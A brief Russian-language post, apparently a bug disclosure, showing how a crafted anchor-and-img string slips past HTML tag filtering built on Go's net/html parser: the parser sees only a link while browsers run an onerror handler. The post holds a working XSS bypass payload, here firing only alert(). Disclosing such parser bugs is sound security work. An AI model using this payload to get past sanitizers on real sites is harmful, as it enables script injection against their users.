обход фильтрации тегов в golang. Для строки <a/href/='https://google.com/#><img src=x onerror=alert()>slon</img></h1>'>google</a> golang net/html увидит следующий DOM Spoiler html head body a ->href: https://google.com/#><img src=x onerror=alert()>slon</img></h1> Code html head body a ->href: https://google.com/#><img src=x onerror=alert()>slon</img></h1> То есть он будет думать что у нас есть только ссылка на google.com В тоже время в браузере вы увидите, что у нас загрузился тег <img> и всплыл popup alert Баг существует в последней версии golang и будет исправлен в next релизе.